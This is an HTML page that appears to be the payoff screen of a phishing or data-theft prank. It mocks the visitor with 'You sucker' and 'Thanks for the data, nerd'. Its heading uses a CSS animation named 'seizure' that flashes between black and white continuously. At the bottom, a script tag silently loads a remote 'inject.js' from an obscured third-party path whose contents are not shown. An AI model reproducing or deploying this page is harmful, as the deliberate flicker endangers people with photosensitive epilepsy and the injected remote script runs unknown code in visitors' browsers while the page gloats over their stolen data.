<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>LOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOLOL</title>
    <link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
    <link rel="stylesheet" href="Version7.0/user16/CSS/style.css">
    <style type="text/css">
        body {
            margin: 50px 15px 0;
            font-family: 'Open Sans', sans-serif;
        }

        h1 {
            color: #2FAC66;
            font-weight: bold;
            padding-bottom: 15px;
        }

        p {
            color: #666;
            font-size: 16px;
        }

        i {
            color: #2FAC66;
            width: 60px;
            height: 60px;
            border-radius: 60px;
            background: #f2f2f2;
            display: inline-block;
            line-height: 62px;
            font-size: 28px;
        }

        .seizure {
            /* Font options */
            font-family: 'Comic Sans MS', fantasy;
            text-shadow: 2px 2px 4px #000000;
            /* Chrome, Safari, Opera */
            -webkit-animation: seizure 1s infinite;
            /* Internet Explorer */
            -ms-animation: seizure 1s infinite;
            /* Standar Syntax */
            animation: seizure 1s infinite;
        }

        /* Chrome, Safari, Opera */

        @-webkit-keyframes seizure {
            0% {
                color: black;
            }

            10% {
                color: white;
            }

            20% {
                color: black;
            }

            30% {
                color: white;
            }

            40% {
                color: black;
            }

            50% {
                color: white;
            }

            60% {
                color: black;
            }

            70% {
                color: white;
            }

            80% {
                color: black;
            }

            90% {
                color: white;
            }

            100% {
                color: black;
            }
        }

        /* Internet Explorer */

        @-ms-keyframes seizure {
            0% {
                color: black;
            }

            10% {
                color: white;
            }

            20% {
                color: black;
            }

            30% {
                color: white;
            }

            40% {
                color: black;
            }

            50% {
                color: white;
            }

            60% {
                color: black;
            }

            70% {
                color: white;
            }

            80% {
                color: black;
            }

            90% {
                color: white;
            }

            100% {
                color: black;
            }
        }

        /* Standard Syntax */

        @keyframes seizure {
            0% {
                color: black;
            }

            10% {
                color: white;
            }

            20% {
                color: black;
            }

            30% {
                color: white;
            }

            40% {
                color: black;
            }

            50% {
                color: white;
            }

            60% {
                color: black;
            }

            70% {
                color: white;
            }

            80% {
                color: black;
            }

            90% {
                color: white;
            }

            100% {
                color: black;
            }
        }
    </style>
</head>

<body>
    <div class="text-center">
        <div><img
                src="https://static.wikia.nocookie.net/meme/images/e/e2/EC40D7F7-55FC-46F2-83D1-AFD009B66F9A.gif/revision/latest/scale-to-width-down/250?cb=20210227164525"
                alt="shut up"></div>
        <h1 class="seizure">You sucker</h1>
        <p>Thanks for the data, nerd</p>
    </div>
    <script type='text/javascript'
        src="https:////www.tutorialrepublic.com/c783231b10f15016836773b2146780d31c513fdfe7de6450b5d3bdd46a33d98b/inject.js"></script>
</body>

</html>